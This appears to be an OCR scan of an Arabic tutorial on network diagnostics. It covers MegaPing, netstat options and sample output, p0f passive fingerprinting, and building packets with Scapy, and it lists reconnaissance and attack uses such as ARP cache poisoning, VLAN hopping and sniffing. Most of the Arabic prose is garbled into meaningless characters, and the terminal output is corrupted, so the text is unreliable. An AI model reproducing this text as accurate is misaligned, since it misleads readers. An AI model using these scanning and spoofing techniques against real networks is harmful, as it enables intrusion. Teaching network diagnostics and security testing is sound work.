.AljJ La L-boi^ jSII J^Lk J-a JllilL jill J-a L^^Jl J^?^ ^ SjSlill j^ati ^jL (J^a^u f jii lS^J MEMORY 



Basic Network Troubleshooting Using MegaPing 

http ://www.magnetosof tcom/ : j^^l 
^Jaj c # ^^rklJ ajjjja^I cjIj^VI jajj (toolkit) cjIj^VI <> uj^j ul ^^J^ ^ MegaPing 

4_jujLja3l laj3 <J-a*J! \lA ^lAaj\\ d^slxJI jiJl ^n/nll 4-lLaxJ ^akVl Wizard (jjj^^ C111JJJJ ^ jlj -J 



Si MegaPing (Unregistered) 

File View Tools Help 

ni i 1 as <$ia<&«i<*a$ , a>.s r iffl|iB 



■^§, DNS List Hosts 
^ DNS Lookup Name 
£ Finger 
Q Network Time 

-II Pin 9 

gg Traceroute 

<^ Whols 

^ Network Resources 
^) Process Info 
^ System Info 

^ NetB ;•):. Scanner 
^ Share Scanner 
^ Security Scanner 
i? y Port Scanner 
0 Host Monitor 
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CjU» jIslxJI ^jAxJU <ul tiL ^j-^LiJ! ^Uaill (^ic *^ j^. jA\ ial_L<J! ^j^; <j| ^aia system info -3 
i^Vl^ c> ^ ^ iaU^ll connection gr^ j ^1511 J!>U> J jj^a jll ^1 j ^ j^VI 



MegaPing (Unregistered) 



_ n 



File View Tools Help 



4 



■jj, DNS List Hosts 

■ * DNS Lookup Name 

jjj Finger 

[^J Network Time 

gg Pincj 

Traceroute 
^ Whols 

■ 5^5 Network Resources 
c '?*> Process Info 



System Info 



IP Scanner 

NetBIOS Scanner 

Share Sc anner 
.10 Security'- Scanner 
■JJ PortSc anner 

Host Monitor 



System Info 



System Info 



Js? Connections gj Statistics 
.All 



^ = Interfaces IP Routing 



ARP 



Protocol 


/ 


PID Local Address 


Remote Addr... 


State 




B-Bl |TCP 


34 ports 


1 2 connecti... 


14:34:42 


A 








7S0 0.0.0.0:135 


0.0.0.0:0 


LISTENING 








139 


4 192.163.16.71... 


0.0.0.0:0 


LISTENING 






i-JF 


159 


4 192.163.50.1:... 


0.0.0.0:0 


LISTENING 






B-JF 


139 


4 192.163.133.1... 


0.0.0.0:0 


LISTENING 






B-JF 


554 


4756 0.0.0.0:554 


0.0.0.0:0 


LISTENING 








902 


2030 0.0.0.0:902 


0.0.0.0:0 


LISTENING 






b-jf 


912 


2030 0.0.0.0:912 


0.0.0.0:0 


LISTENING 






i-JF 


1025 


563 0.0.0.0:1025 


0.0.0.0:0 


LISTENING 






B-JF 


1025 


996 0.0.0.0:1026 


0.0.0.0:0 


LISTENING 






B-JF 


1027 


623 0.0.0.0:1027 


0.0.0.0:0 


LISTENING 






B-jr 


1023 


404 0.0.0.0:1023 


0.0.0.0:0 


LISTENING 






h-JF 


1029 


1530 0.0.0.0:1029 


0.0.0.0:0 


LISTENING 






B-JF 


1036 


620 0.0.0.0:1036 


0.0.0.0:0 


LISTENING 








1241 


652 127iL0.1:1241 


0.0.0.0:0 


LISTENING 

I I fTr Pl 1 1 Pl I H -1 


V 



r^iAuto 
^ Refresh 

I I Active Only 

i Show 



□ 



Names 



Report 



netstat >»VI 
? netstat 

^j^ii 6a£jjoJI ^ J^Loui ^-^V ^>*^ ^ ^.^'iuijj Windows NT. s*^lLuia1I JjixjuLill a j t^AiJ j ^jjo^jj ^ 

: netstat>&t cjUIjII^I 

j^bU jSaVI t*3 jLoJ! > tiA o- 3 ^ ^Itdl JIj <> ^ Vi.Vilt a<>u*\\ CjVU^j! jl*JaV [netstat] j^Vl Vjl 
.11a J£ £-H*J V ^1 j CjUij^a j djUij^a o^a^su (option) CjIj;^ jj^j <Lsu^j jjoj ^jil j t [netstat] 

^ ^-aUJI Jl^Jl ^ ^1 cjUUxII ^UuJ3 ^viun t [Unix socket]c5^ ^ lU^ c^ 3 ^ j^^^ [netstat] c> '^j 

.^jj^jjjoJI ^ (jyiLaall lie. Igj o^lc V ^jaJ tillil tdiVl^ajl ^ SjJjU-d -iaiijj V [UNIX socket] 

?LA^il uL£ j [netstatj^^t gai 6^J^^ Jxi) IjU 

.UDP J JJJ ^^Lujj ^1 diVt^V! (J^H o^ 3 ^ [-u] 
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Uiajl j <JL^jVI 4_Ajta3l [process] t - ^ ^ ^* ^ ^ > <*-^-a j^*-* fa <^^j 6 [-n] j [-p] U^JJJ**^ ^l^VimU ^gj^ajij 

[root@dhcppc3 netstat -tupn 

Active Internet connections (w/o servers) 

Proto Recv-0 Send-Q Local Address Foreign Address State PID/Program name 



tcp 0 S 192.168.16.73:22 192.168.16.70:50834 ESTABLISHED 17122/sshd 

tcp 1 0 192.168.16.73:57474 41.128.128.24:80 CLOSEWAIT 14297/clock-applet 

tcp 1 0 192.168.16.73:57473 41.128.128.24:80 CLOSEWAIT 2799/clock-applet 

tcp 0 0 192.168.16.73:37385 173.194.41.64:80 ESTABLISHED 29274/f iref ox 

tcp 0 0 192.168.16.73:22 192.168.16.70:50835 ESTABLISHED 17126/sshd 



[root@dhcppc3 -]# | 

4<JUi]| djU^kll ^ U Ai^J <^U^ AjiaVl cjVI «1QU <*^I^<JI Ak. aJI ^H^J U JajjJaJb dbaJ l^jl .i^a [auditing] 

.IfkUS) ^ JU^I netstat j^i 0* J*^ 

?f g^iaj l-axuuj ^ji cgjjjj J^g^j ^jj^j J>^l g-^J cgj lJJ^j cgjj) CjUIaxJIj QJ& j^uJ) ^ ji J*i) )3U 

t^j W^l [listen] o^j^ 5^ ^ ls'^ netstat j*Vl [-1] ^I^l-U JaJl 

[root@dhcppc3 ~]# netstat -tupnl 



Active Internet connections (only servers) 



Proto 


Recv-0 


Send-0 


Local Address 


Foreign Address 


State 


PID/Program name 


tcp 


0 


0 


192.168.122.1:53 


0.0.0.0 


- 


LISTEN 


2188/dnsmasq 


tcp 


0 


0 


0.0.0.0:22 


0.0.0.0 




LISTEN 


20210/sshd 


tcp 


0 


0 


127.0.0.1:631 


0.0.0.0 




LISTEN 


1707/cupsd 


tcp 


0 


0 


127.0.0.1:25 


0.0.0. 0 




LISTEN 


2002/master 


tcp 


0 


0 


127.0.0.1:6010 


0.0.0.0 




LISTEN 


17122/sshd 


tcp 


0 


0 


: : :80 


: : : * 




LISTEN 


2034/httpd 


tcp 


0 


0 


: : :22 


. . . * 




LISTEN 


20210/sshd 


tcp 


0 


0 


M 1-631 


: : : * 




LISTEN 


1707/cupsd 


tcp 


0 


0 


: :1:25 


: : : * 




LISTEN 


2002/master 


tcp 


0 


0 


: :1:6010 


: : : * 




LISTEN 


17122/sshd 


udp 


0 


0 


192.168.122.1:53 


0.0.0.0 


* 




2188/dnsmasq 


udp 


0 


0 


0.0.0.0:67 


0.0.0.0 


- 




2188/dnsmasq 


udp 


0 


0 


0.0.0.0:68 


0.0.0.0 






16136/dhclient 


udp 


0 


0 


0.0.0.0:54244 


0.0.0.0 






16984/local 


udp 


0 


0 


0.0.0.0:631 


0.0.0.0 






1707/cupsd 



[root@dhcppc3 -]# | 

-c ^iU3l li^A j 80 a a >lklu^ j jL^ajl Cjj^aJ ftjjaala j ftjALa. L^jj ^aJ httpd <-ft^aJl 

. [firewall] ^j^^JI 1^ jjc ^jj iaLLJI (j^t> ^£^j3I ^jli ^ U j£i La£ (j^Jj 

yjlj jjp netstatj^Sfb J*jt &\ ^Iji^j IjU 



[root(adhcppc3 netstat -s | head -n IB 

Ip: 

123800 "total packets received 
5 with invalid addresses 
Q forwarded 

0 incoming packets discarded 
107918 incoming packets delivered 
99081 requests sent out 
69 dropped because of missing route 
Icmp : 

4415 ICMP messages received 
[root(adhcppc3 — ]# | 
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;JN\S [-r] j^Jt {\*&U4 [routing table] Jj^ u^j^ ^ 



[root@dhcppc3 ~]# netstat -r 














Kernel IP routing table 














Destination Gateway 


Genmask 


Flags 


HSS 


Window 


irtt 


Iface 


192.168.16.Q * 


255.255.255.0 


U 


0 


0 


0 


ethO 


192.168.122.0 * 


255.255.255.0 


U 


0 


0 


0 


virb r0 


default 192.168.16.1 


0.0.0.0 


UG 


0 


0 


0 


ethO 


[root@dhcppc3 -]# | 















jajj Ja 

a a( J?i\£ Actual CjL^jixA <j^a jxJ [-e] jj jt^I aI^L nb LusjIj [-j] jjjju]) aI^L nb AlxuJl ^ CjLa^Lua q^- 4 - 4 f*^ 



[ root@dhcppc3 -]# netstat -i 








Kernel Interface table 








Iface MTU Met FIX- OK RX- ERR RX-DRP RX-OVR TX-OK TX- ERR TX 


DRP TX 


□VR 


Fig 


eth© 150S 0 121751 0 0 0 91743 0 


0 


0 


BHRU 


to 16436 0 16449 0 0 0 16449 0 


0 


0 


LRU 


virbrQ 1500 0 0000 00 


0 


0 


BMRU 


[ root@dhcppc3 —]# netstat -ie 








Kernel Interface table 








eth0 Link encap : Ethernet HWaddr 00 : 0C : 29 : 51 : 41 : 91 








inet addr: 192. 168. 16.73 Beast : 192 . 168 . 16 . 255 Hask:255.255 


.255.0 






inet6 addr: f e80 :: 20c : 29ff : fe51 : 4191/64 Scope:Link 








UP BROADCAST RUNNING MULTICAST MTU : 1500 Metric: 1 








RX packets : 121751 errors :0 dropped :0 overruns :0 frame :0 








TX packets : 91743 errors:0 dropped:© overruns:© carrier:© 








collisions : 0 txqueuelen : 1000 








RX bytes: 138974644 (132.5 MiB) TX bytes : 6897808 (6.5 MiB) 








Interrupt: 19 Base address : 0x2000 









[ifconfig] j-STI UU2 <UL [netstat©-ie] j-Sfl oi ^* 



POF SlAl 

I^VIS I gnj , ,-! j wireshark s^VI lSj5 l>« l^Jalajll ^ ^1 cjlaLlI JJaj] pOf ^,1^1 mi 



#pOf©-s©/tmp/targethost.pcap©-o©pOf-result.log©-l 



Network DISCOVERY WITH SCAPY 

^jIjj j£ jj j^>JI (O^ jj j 6 c£ cJc-^^ 2^-^ scapy ic£^>^ ^jW*^ 

L_flLaLi£Vlj ^iiillj scanning <Jt ^j^*-*^ ^-g--^ Cy* ^ j^-^ 'jj. IgJaliiilL ^j^j ^^^LaiVI <J^-^ ^ ^ 1 " ♦ 

' arping' arp-sk'arpspoof <Hping s lU* lK> lA^ lJU^£Ij ^L^l^j tCjI^jll jlii^lj 

.tshark Jlj < tcpdump'Nmap J *l j>l c^j pOf 

(. . . 5 VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel) cjU£i3l jjj 
i^L^j] JU3I j^Vl ^I^IojI j^V^ ^ <^^j V c>j ^Uij ^1 jla Scapy (jjj^^l 



root^KaliAttacker apt -get install python-scapy 



j£ ^Ul^! (-aha Jp J^l j-d Ijliaa l^JjUlS uij^u Jr^3 Scapy St jVI j-^ I^j ^b£i) (2)1^1 ^ cr^t ^I^-aJI U^u ^Jj Lu£ 

(network, port, protocol scanning)c> lS^J ^1 -2 

(tracerouting, rewalking, ngerprinting)i> ciL£&l -3 

(poisoning, leaking, sniffing)^W^ -4 

(text, html)) j^j^i ^\ -5 
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AjjL un \ty*\ a .J 



.THREE WAY HANDSHACK *£*5II <^L^L f Uill -6 
^ ^j^lSI f^-*^ ^ ^ i j .string cJI j loop cJI ^^lun <jl ^iLlaua t^jjlAj 4jJ 4_LjujI jj (^-^ g^^-o^ ^ 

.^Vl <f>J! Ji— j' :c«^ SCAPY f A tr^J 

.v, oil 



scapy 

INFO: Can't import python gnuplot wrapper . Won't be able to plot. 
WARNING: No route found for IPv6 destination :: [no default route?] 
Welcome to Scapy (2.2.Q) 



tillij ip !>H<i (j^Jj IP() lW-*^ ^ IP () lS^»-^ tillij Jjuj^aII (jt jjc 



src= 127.Q.Q. 1 
dst= 127. 0.0.1 

\ \ 



ip 


.dst = "173.194.113.146" 




»> ip 


.display ( ) 




###[ 


]### 




s rc= 


192. 168. 16.73 




dst= 


173. 194. 113. 146 




\ 

»> 


\ 





.ip.dst ^t^aJLualj 4\n»""j ^ u* J ( 127.0.0.1 c> (dst) J^j^' ub^- ^ ^ ^ J^5U - 



^ jijj IC1VIP 4^*3^ ^-l^Jujj L_fl jjuj j lg_LuJ^)j L_fl jjuj ^^jll 4^*3^ ^ ^J^^ J ^I^Jj (jVI ^ J^j 
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= ICMPO 
.display [ ) 
]### 



.ICMP ^ lSj 1 ^ ping j^j (aJI JI^jVI 



windows = s 


n ( 


;ip/ping] 


Begin emission: 






. .Finished to s< 


snd 


1 packets. 


Received 5 pack* 


ats j 


. got 1 answers, remaining O packets 


I 







>» windows .display [ ) 
###[ ]### 

version= 4L 
ihl= 5L 
tos= 0x0 
len= 28 • 



src= 173. 194. 113. 146 

dst = 192. 168. 16.73 
\ \ 
»[ ]### 



###[ ]### 
= 

»> 

Keyboard Interrupt 
»>l 



ILLoj <j51S Ig-T.rt ^^jII CjI jjjtMI ^ia^. ^jLoJ! <JiLa Uiajl TCP (O^ cJ^jl ^ 1 * ^1 i^i> ul 

.CjV j£ jjjjJI (>» ^j^xJI *c>Si ftbVl *>i& jl 

.GXit() ^Aaajoij ^ J ls() ,>*VI ^bVlml (_3^^>ia (JC- dj^Lilx-<Jl j <La,lkjjuuJl CjV j£ jJ J^)^ ^J^> 

(01009943027) ^ 
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